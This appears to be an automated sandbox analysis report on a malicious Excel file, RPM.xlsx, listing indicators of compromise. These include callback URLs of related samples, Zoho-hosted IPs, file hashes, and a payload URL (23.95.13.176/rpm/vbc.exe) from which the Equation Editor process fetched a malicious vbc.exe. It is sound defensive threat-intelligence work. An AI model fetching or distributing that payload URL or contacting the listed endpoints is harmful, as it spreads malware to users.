                                                                                                                  1SGErShR6f.exeGet hashmaliciousBrowse
                                                                                                                  • www.algorham.photography/9gdg/?-Zy0C=KpgElkcWFcjqyeSGO9QZi7XxLzPNnjgSBvEAJIhdgTJJE+sUfAsXGNDOeg31GCwNnk0KE08KHQ==&lN=5jot7b-
                                                                                                                  DUE PAYMENT.exeGet hashmaliciousBrowse
                                                                                                                  • www.metalworkingadditives.online/b2c0/?2dpPwJP=tQ9OUq/au2j7Ts3tmWTzZlmpGIW84sc0d5YJpv42KDMZxUSBkatd7Ys79Ddqwtu/lQ5M&uN9=3fPH4rk8fd4xHD
                                                                                                                  purchase_order_list.exeGet hashmaliciousBrowse
                                                                                                                  • www.stlukeumcaustin.com/ou3t/?k2JX=9VQujrVTrcTji/Bq328+1BaPa4HhfraTQ84xCqIdcFrxw64TUlht5XYEWRLQpUOhEzDq&y2JtQ=Wj6tol
                                                                                                                  Order Confirmation.exeGet hashmaliciousBrowse
                                                                                                                  • www.utahtree.company/ccxq/?5jblpb=Q8Gd4NQ&axodBzip=3w68OVPhLZ8zZRheUFW50c7gNy+0aggzGXt5gDR6JFiPZJaNzPn/iUSQ/rYcdDcZGq5a
                                                                                                                  Quotation - Urgent.exeGet hashmaliciousBrowse
                                                                                                                  • www.metalworkingadditives.online/b2c0/?D2MHc8Q=tQ9OUq/fzxn+R82X6GTzZlmpGIW84sc0d5YJpv42KDMZxUSBkatd7Ys79Ad1zpKElTcI&cPbdBT=u0GhC6
                                                                                                                  t0ID2yWRERNRIz4.exeGet hashmaliciousBrowse
                                                                                                                  • www.prajapati.company/gjeh/?9rv=SUFY+Gja1P+PvBiRR7N/is+XGueQ0Rg08oIvxL0Dmpwq5lWnSHw8ki9VPiYk6egxSqer&SN9H9b=xXBXNXJHf0r

                                                                                                                  Domains

                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                  zhs.zohosites.com009283774652673_pdf.exeGet hashmaliciousBrowse
                                                                                                                  • 204.141.42.73
                                                                                                                  v86Jk19LUb.exeGet hashmaliciousBrowse
                                                                                                                  • 163.53.93.240
                                                                                                                  RFQ_00701521.exeGet hashmaliciousBrowse
                                                                                                                  • 204.141.42.73
                                                                                                                  IMAGE20210427001922654.exeGet hashmaliciousBrowse
                                                                                                                  • 204.141.42.73

                                                                                                                  ASN

                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                  ZOHO-ASUS009283774652673_pdf.exeGet hashmaliciousBrowse
                                                                                                                  • 204.141.42.73
                                                                                                                  INVOICE%20044%20FA%20ROCK.jsGet hashmaliciousBrowse
                                                                                                                  • 204.141.42.97
                                                                                                                  Payment Proof Pdf.exeGet hashmaliciousBrowse
                                                                                                                  • 136.143.182.56
                                                                                                                  Payment Proof Pdf.exeGet hashmaliciousBrowse
                                                                                                                  • 136.143.182.56
                                                                                                                  INVOICE%20044%20FA%20ROCK.jsGet hashmaliciousBrowse
                                                                                                                  • 204.141.42.97
                                                                                                                  d892WNULGF.exeGet hashmaliciousBrowse
                                                                                                                  • 204.141.43.24
                                                                                                                  Overdue Invoices.xlsxGet hashmaliciousBrowse
                                                                                                                  • 204.141.43.24
                                                                                                                  Invoice&Forms.xlsxGet hashmaliciousBrowse
                                                                                                                  • 204.141.42.123
                                                                                                                  Invoice&Forms.xlsxGet hashmaliciousBrowse
                                                                                                                  • 204.141.42.123
                                                                                                                  Invoice&Forms.xlsxGet hashmaliciousBrowse
                                                                                                                  • 204.141.42.97
                                                                                                                  Invoice&Forms.xlsxGet hashmaliciousBrowse
                                                                                                                  • 204.141.42.97
                                                                                                                  2021APT-28_62292453.jsGet hashmaliciousBrowse
                                                                                                                  • 204.141.42.97
                                                                                                                  INV#339BT.exeGet hashmaliciousBrowse
                                                                                                                  • 136.143.190.56
                                                                                                                  DesktopCentralAgent.exeGet hashmaliciousBrowse
                                                                                                                  • 204.141.43.156
                                                                                                                  DesktopCentralAgent.exeGet hashmaliciousBrowse
                                                                                                                  • 136.143.191.45
                                                                                                                  DCCLOUDTEST_Agent.exeGet hashmaliciousBrowse
                                                                                                                  • 136.143.191.45
                                                                                                                  DCCLOUDTEST_Agent.exeGet hashmaliciousBrowse
                                                                                                                  • 136.143.191.45
                                                                                                                  IMAGE20210427001922654.exeGet hashmaliciousBrowse
                                                                                                                  • 204.141.42.73
                                                                                                                  ashwinds_Agent.exeGet hashmaliciousBrowse
                                                                                                                  • 204.141.43.156
                                                                                                                  5zc9vbGBo3.exeGet hashmaliciousBrowse
                                                                                                                  • 136.143.191.44

                                                                                                                  JA3 Fingerprints

                                                                                                                  No context

                                                                                                                  Dropped Files

                                                                                                                  No context

                                                                                                                  Created / dropped Files

                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
                                                                                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:downloaded
                                                                                                                  Size (bytes):626688
                                                                                                                  Entropy (8bit):7.294961182646713
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12288:BB6AGIF/OXu5OtiBIZzG/NoC9NPNIQt5XyGY0:JGIF3wOI5G1oCXPzTVY
                                                                                                                  MD5:0ECA879131A7B104418B085DB7F761C3
                                                                                                                  SHA1:07FA4692AA15A409091BC6190BF33B5942DB99E6
                                                                                                                  SHA-256:166559731AD15341F955BF8A16708F93542BEF868C33F02F70E9B27F57B991A3
                                                                                                                  SHA-512:952420118839A1AA8FB2C498910D784AEACB2A9ED953845415E7C523C41F0D3755EC6FCDA769E6045C0677D4A002D86B278876B877FC058054F95774B15332AB
                                                                                                                  Malicious:true
                                                                                                                  Reputation:low
                                                                                                                  IE Cache URL:http://23.95.13.176/rpm/vbc.exe
                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Qa..............0.................. ........@.. ....................................@.................................0...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................d.......H........................1..hp...........................................r...p*.r...p*.......*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*...(......(.....,...,..~....o3...*...(......(.....(....-..~....o3...*..(....%o2....(....o3....(....%o2...r1..p(....o3...*r.(......(......(......(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*"..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}...
                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\19162964.jpeg
                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):14198
                                                                                                                  Entropy (8bit):7.916688725116637
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
                                                                                                                  MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
                                                                                                                  SHA1:72CA86D260330FC32246D28349C07933E427065D
                                                                                                                  SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
                                                                                                                  SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
                                                                                                                  Malicious:false
                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                  Preview: ......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.*5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...|5.2...*..%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......|j.4.mn..Ke!G.6*PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q*[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.|..10........... ..l..|F...E9*...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.*V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...
                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2561F215.png
                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                  File Type:PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):33795
                                                                                                                  Entropy (8bit):7.909466841535462
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:768:mEWnXSo70x6wlKcaVH1lvLUlGBtadJubNT4Bw:mTDQx6XH1lvYlbdJux4Bw
                                                                                                                  MD5:613C306C3CC7C3367595D71BEECD5DE4
                                                                                                                  SHA1:CB5E280A2B1F4F1650040842BACC9D3DF916275E
                                                                                                                  SHA-256:A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
                                                                                                                  SHA-512:FCA7D4673A173B4264FC40D26A550B97BD3CC8AC18058F2AABB717DF845B84ED32891F97952D283BE678B09B2E0D31878856C65D40361CC5A5C3E3F6332C9665
                                                                                                                  Malicious:false
                                                                                                                  Preview: .PNG........IHDR..............T+....)iCCPicc..x..gP......}..m....T).HYz.^E...Y."bC..D..i. ...Q).+.X...X.,....."*(.G.L.{'?..z.w.93..".........~....06|G$/3........Q@.......%:&.......K....\............JJ.. ........@n..3./...f._>..L~...... ......{..T.|ABlL..?-V...ag.......>.......W..@..+..pHK..O.....o....................w..F.......,...{....3......].xY..2....( .L..EP.-..c0.+..'p.o..P..<....C....(.........Z...B7\.kp...}..g .)x.......!"t... J.:...#...qB<.?$..@.T$..Gv"%H9R.4 -.O....r..F. ..,.'...P..D.P....\...@.qh.....{.*..=.v....(*D...`T..)cz..s...0,..c[.b..k..^l.{...9.3..c..8=........2p[q....I\.....7...}....x].%...........f|'..~.?..H .X.M.9...JH$l&....:.W..I...H.!......H..XD.&."^!.....HT....L.#...H..V.e..i..D.#..-...h.&r....K.G."/Q.)..kJ.%...REi...S.S.T.....@.N.....NP?.$h:4.Z8-...v.v.....N.k...at.}/..~....I.!./.&.-.M.V.KdD.(YT].+.A4O.R...=.91.....X..V.Z..bcb...q#qo...R.V...3.D...'.h.B.c..%&..C....1v2..7.SL.S...Ld.0O3.....&.A......$.,...rc%..XgY.X_....R1R{..F.....
                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5CE7E12F.png
                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                  File Type:PNG image data, 484 x 544, 8-bit/color RGB, non-interlaced
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):65050
                                                                                                                  Entropy (8bit):7.959940260382877
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:LT3dRSPKeePekFnfpQ6uF2sxiPfqu2RjWn0ZqNnbMXrpLlx6q1F:fdoPI79fpQXtjupn7Nnb8pLll
                                                                                                                  MD5:22335141D285E599CDAEF99EABA59D5B
                                                                                                                  SHA1:C8E5F6F30E91F2C55D96867CAA2D1E21E7A4804D
                                                                                                                  SHA-256:6C0757667F548698B721E4D723768447046B509C1777D6F1474BDE45649D92B0
                                                                                                                  SHA-512:CF623DC74B631AAE3DBECF1F8D7E6E129F0C44F882487F367F4CB955A3D5A9AAE96EFD77FB0843BCE84F5F9D4A3C844A42193B7C4F1D374CE147399E1C3A6C2B
                                                                                                                  Malicious:false
                                                                                                                  Preview: .PNG........IHDR....... ......]....b.zTXtRaw profile type exif..x..Y..8.].9.........L3....UFvU&.d..|q.;..f..^...........j.W..^...RO=..C.....=......N..).._......=........./...........?....Cl.>.......7...~....'..<...W..{o......q..5~..O.;U.ce>.W.Oxn...-.O......w..I........v..s&.|x....:......?..u.??P....y.....}q..'..}.?...........}.j..o...I...K......G.._+.U...?..W..+Nnlq.....z....RX.._...3L.1..9.........8.$.._.\....Ln....%.....fh|...d.|X.7........_....StC......+*.<.7...S\H...i>.{...Nn....../.....#..d.9...s.N..S.P...........Kxr(.1..8....<y|R..@.9.p}......E.....l......"?.Ui....RF~jj.....s...{~.SR..Z.Qo}j...Zk....i..VZm......LX......./..../?.#.g..G.u...;...f.e..f...Y..*.^.....6.................}.{.vk............[...........G..I.....7^...:zgw.)Eo.;.{D)r..B.rV....C._....us..]9...[..n...._...........sk.=..9...z...a......e.7.<Vm;....s.w....o./kq.y.w..:q`;..A({.}...w~<.S..WJ.).Zz.c.#`.xN...1.9..1...k.o. ..-.M|....,..i.[.\.;......8...x.
                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7D72DE31.png
                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                  File Type:PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):33795
                                                                                                                  Entropy (8bit):7.909466841535462
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:768:mEWnXSo70x6wlKcaVH1lvLUlGBtadJubNT4Bw:mTDQx6XH1lvYlbdJux4Bw
                                                                                                                  MD5:613C306C3CC7C3367595D71BEECD5DE4
                                                                                                                  SHA1:CB5E280A2B1F4F1650040842BACC9D3DF916275E
                                                                                                                  SHA-256:A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
                                                                                                                  SHA-512:FCA7D4673A173B4264FC40D26A550B97BD3CC8AC18058F2AABB717DF845B84ED32891F97952D283BE678B09B2E0D31878856C65D40361CC5A5C3E3F6332C9665
                                                                                                                  Malicious:false
                                                                                                                  Preview: .PNG........IHDR..............T+....)iCCPicc..x..gP......}..m....T).HYz.^E...Y."bC..D..i. ...Q).+.X...X.,....."*(.G.L.{'?..z.w.93..".........~....06|G$/3........Q@.......%:&.......K....\............JJ.. ........@n..3./...f._>..L~...... ......{..T.|ABlL..?-V...ag.......>.......W..@..+..pHK..O.....o....................w..F.......,...{....3......].xY..2....( .L..EP.-..c0.+..'p.o..P..<....C....(.........Z...B7\.kp...}..g .)x.......!"t... J.:...#...qB<.?$..@.T$..Gv"%H9R.4 -.O....r..F. ..,.'...P..D.P....\...@.qh.....{.*..=.v....(*D...`T..)cz..s...0,..c[.b..k..^l.{...9.3..c..8=........2p[q....I\.....7...}....x].%...........f|'..~.?..H .X.M.9...JH$l&....:.W..I...H.!......H..XD.&."^!.....HT....L.#...H..V.e..i..D.#..-...h.&r....K.G."/Q.)..kJ.%...REi...S.S.T.....@.N.....NP?.$h:4.Z8-...v.v.....N.k...at.}/..~....I.!./.&.-.M.V.KdD.(YT].+.A4O.R...=.91.....X..V.Z..bcb...q#qo...R.V...3.D...'.h.B.c..%&..C....1v2..7.SL.S...Ld.0O3.....&.A......$.,...rc%..XgY.X_....R1R{..F.....
                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\907AA912.jpeg
                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):8815
                                                                                                                  Entropy (8bit):7.944898651451431
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                                                                                                                  MD5:F06432656347B7042C803FE58F4043E1
                                                                                                                  SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                                                                                                                  SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                                                                                                                  SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                                                                                                                  Malicious:false
                                                                                                                  Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B859C1EB.png
                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                  File Type:PNG image data, 484 x 544, 8-bit/color RGB, non-interlaced
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):65050
                                                                                                                  Entropy (8bit):7.959940260382877
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:LT3dRSPKeePekFnfpQ6uF2sxiPfqu2RjWn0ZqNnbMXrpLlx6q1F:fdoPI79fpQXtjupn7Nnb8pLll
                                                                                                                  MD5:22335141D285E599CDAEF99EABA59D5B
                                                                                                                  SHA1:C8E5F6F30E91F2C55D96867CAA2D1E21E7A4804D
                                                                                                                  SHA-256:6C0757667F548698B721E4D723768447046B509C1777D6F1474BDE45649D92B0
                                                                                                                  SHA-512:CF623DC74B631AAE3DBECF1F8D7E6E129F0C44F882487F367F4CB955A3D5A9AAE96EFD77FB0843BCE84F5F9D4A3C844A42193B7C4F1D374CE147399E1C3A6C2B
                                                                                                                  Malicious:false
                                                                                                                  Preview: .PNG........IHDR....... ......]....b.zTXtRaw profile type exif..x..Y..8.].9.........L3....UFvU&.d..|q.;..f..^...........j.W..^...RO=..C.....=......N..).._......=........./...........?....Cl.>.......7...~....'..<...W..{o......q..5~..O.;U.ce>.W.Oxn...-.O......w..I........v..s&.|x....:......?..u.??P....y.....}q..'..}.?...........}.j..o...I...K......G.._+.U...?..W..+Nnlq.....z....RX.._...3L.1..9.........8.$.._.\....Ln....%.....fh|...d.|X.7........_....StC......+*.<.7...S\H...i>.{...Nn....../.....#..d.9...s.N..S.P...........Kxr(.1..8....<y|R..@.9.p}......E.....l......"?.Ui....RF~jj.....s...{~.SR..Z.Qo}j...Zk....i..VZm......LX......./..../?.#.g..G.u...;...f.e..f...Y..*.^.....6.................}.{.vk............[...........G..I.....7^...:zgw.)Eo.;.{D)r..B.rV....C._....us..]9...[..n...._...........sk.=..9...z...a......e.7.<Vm;....s.w....o./kq.y.w..:q`;..A({.}...w~<.S..WJ.).Zz.c.#`.xN...1.9..1...k.o. ..-.M|....,..i.[.\.;......8...x.
                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D625CE7E.jpeg
                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):8815
                                                                                                                  Entropy (8bit):7.944898651451431
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                                                                                                                  MD5:F06432656347B7042C803FE58F4043E1
                                                                                                                  SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                                                                                                                  SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                                                                                                                  SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                                                                                                                  Malicious:false
                                                                                                                  Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E0181866.emf
                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):648132
                                                                                                                  Entropy (8bit):2.8121906229106655
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3072:134UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:l4UcLe0JOcXuunhqcS
                                                                                                                  MD5:BD773E99C689A8854494E95F150488D4
                                                                                                                  SHA1:A109C2B17766CDE7F0A495C13E6B28D652282E9A
                                                                                                                  SHA-256:85C9B8E1EE4B5F3271BF10A9A756C8B550318BA682ED4231F5665D75894B0AAB
                                                                                                                  SHA-512:7592A9D790C477141DA844A6EA6D113208A7A0C12EC6DE54954B9F27C13309E28B26EFD8D0F7A3B72A04207DEB0625BD7AA7B9E2CF1E3BA2BB55775F1787694D
                                                                                                                  Malicious:false
                                                                                                                  Preview: ....l...........................m>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i.....................................................9X$........fCX.@0.%...............L.......RQ.YL...D...........0...$Q.YL...D... ...IdCXD...L... ............dCX............O...........................%...X...%...7...................{$..................C.a.l.i.b.r.i...............X...D...x....8;X........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FC57AF0.jpeg
                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):14198
                                                                                                                  Entropy (8bit):7.916688725116637
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
                                                                                                                  MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
                                                                                                                  SHA1:72CA86D260330FC32246D28349C07933E427065D
                                                                                                                  SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
                                                                                                                  SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
                                                                                                                  Malicious:false
                                                                                                                  Preview: ......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.*5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...|5.2...*..%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......|j.4.mn..Ke!G.6*PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q*[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.|..10........... ..l..|F...E9*...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.*V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...
                                                                                                                  C:\Users\user\Desktop\~$RPM.xlsx
                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):330
                                                                                                                  Entropy (8bit):1.4377382811115937
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                                                  MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                                                  SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                                                  SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                                                  SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                                                  Malicious:true
                                                                                                                  Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                  C:\Users\Public\vbc.exe
                                                                                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):626688
                                                                                                                  Entropy (8bit):7.294961182646713
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12288:BB6AGIF/OXu5OtiBIZzG/NoC9NPNIQt5XyGY0:JGIF3wOI5G1oCXPzTVY
                                                                                                                  MD5:0ECA879131A7B104418B085DB7F761C3
                                                                                                                  SHA1:07FA4692AA15A409091BC6190BF33B5942DB99E6
                                                                                                                  SHA-256:166559731AD15341F955BF8A16708F93542BEF868C33F02F70E9B27F57B991A3
                                                                                                                  SHA-512:952420118839A1AA8FB2C498910D784AEACB2A9ED953845415E7C523C41F0D3755EC6FCDA769E6045C0677D4A002D86B278876B877FC058054F95774B15332AB
                                                                                                                  Malicious:true
                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Qa..............0.................. ........@.. ....................................@.................................0...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................d.......H........................1..hp...........................................r...p*.r...p*.......*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*...(......(.....,...,..~....o3...*...(......(.....(....-..~....o3...*..(....%o2....(....o3....(....%o2...r1..p(....o3...*r.(......(......(......(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*"..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}...

                                                                                                                  Static File Info

                                                                                                                  General

                                                                                                                  File type:CDFV2 Encrypted
                                                                                                                  Entropy (8bit):7.988463876691892
                                                                                                                  TrID:
                                                                                                                  • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                                                                  File name:RPM.xlsx
                                                                                                                  File size:421464
                                                                                                                  MD5:eaa0090a7f7c6f995a4ff9b84410ef81
                                                                                                                  SHA1:82198ab187a84b7a90ae83d57bfddd3c3acaafbc
                                                                                                                  SHA256:a81768982216ba95346c4a6eb0a591e71ab952b187565aef82331e8bb60851ea
